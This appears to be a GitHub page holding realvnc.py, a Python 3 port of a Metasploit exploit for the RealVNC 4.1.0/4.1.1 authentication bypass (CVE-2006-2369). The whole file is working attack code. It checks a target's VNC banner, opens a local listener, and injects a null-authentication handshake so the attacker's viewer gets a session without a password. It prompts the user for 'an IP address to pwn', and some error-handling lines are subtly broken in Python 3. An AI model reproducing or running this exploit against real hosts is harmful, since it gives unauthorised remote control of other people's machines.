-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathrealvnc.py
100 lines (94 loc) · 2.88 KB
/
realvnc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
# Date: 2012-05-13
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1.0 and 4.1.1
# Tested on: Windows XP
# CVE: CVE-2006-2369
# Requires vncviewer installed
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
# Adaptação para o python 3.9.2 by jamaljag
import select
import threading
import os
import socket
import sys, re
BIND_ADDR = '127.0.0.1' # Aqui utilizar o seu IP que vai receber a conexão.
BIND_PORT = 4444
def pwn4ge(host, port):
socket.setdefaulttimeout(5)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((host, port))
except socket.error as msg:
print('[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1])
sys.exit();
else:
hello = server.recv(12).decode()
print("[*] Hello From Server: " + hello)
if hello != "RFB 003.008\n":
print("[*] The remote VNC service is not vulnerable")
sys.exit()
else:
print( "[*] The remote VNC service is vulnerable")
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
listener.bind((BIND_ADDR, BIND_PORT))
except socket.error as msg:
print('[*] Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])
sys.exit()
print("[*] Listener Socket Bind Complete")
listener.listen(10)
print("[*] Launching local vncviewer")
threading.Thread(target=os.system('vncviewer ' + BIND_ADDR + '::' + str(BIND_PORT) + " &"))
print("[*] Listener waiting for VNC connections on localhost")
try:
client, caddr = listener.accept()
except socket.timeout as err:
print('Timeout')
listener.close()
client.send(hello.encode())
chello = client.recv(12).decode()
server.send(chello.encode())
methods = server.recv(2).decode()
print("[*] Auth Methods Recieved. Sending Null Authentication Option to Client")
client.send(b"\x01\x01")
client.recv(1).decode()
server.send(b"\x01")
server.recv(4).decode()
client.send(b"\x00\x00\x00\x00")
print("[*] Proxying data between the connections...")
running = True
while running:
selected = select.select([client, server], [], [])[0]
if client in selected:
buf = client.recv(8192)
if len(buf) == 0:
running = False
server.send(buf)
if server in selected and running:
buf = server.recv(8192)
if len(buf) == 0:
running = False
client.send(buf)
pass
client.close()
server.close()
sys.exit()
def printUsage():
print( "[*] Read the source, Luke!")
def main():
try:
SERV_ADDR = sys.argv[1]
SERV_PORT = sys.argv[2]
except:
SERV_ADDR = input("[*] Please input an IP address to pwn: ")
SERV_PORT = 5900
try:
socket.inet_aton(SERV_ADDR)
except socket.error:
printUsage()
else:
pwn4ge(SERV_ADDR.strip(), int(SERV_PORT))
if __name__ == "__main__":
main()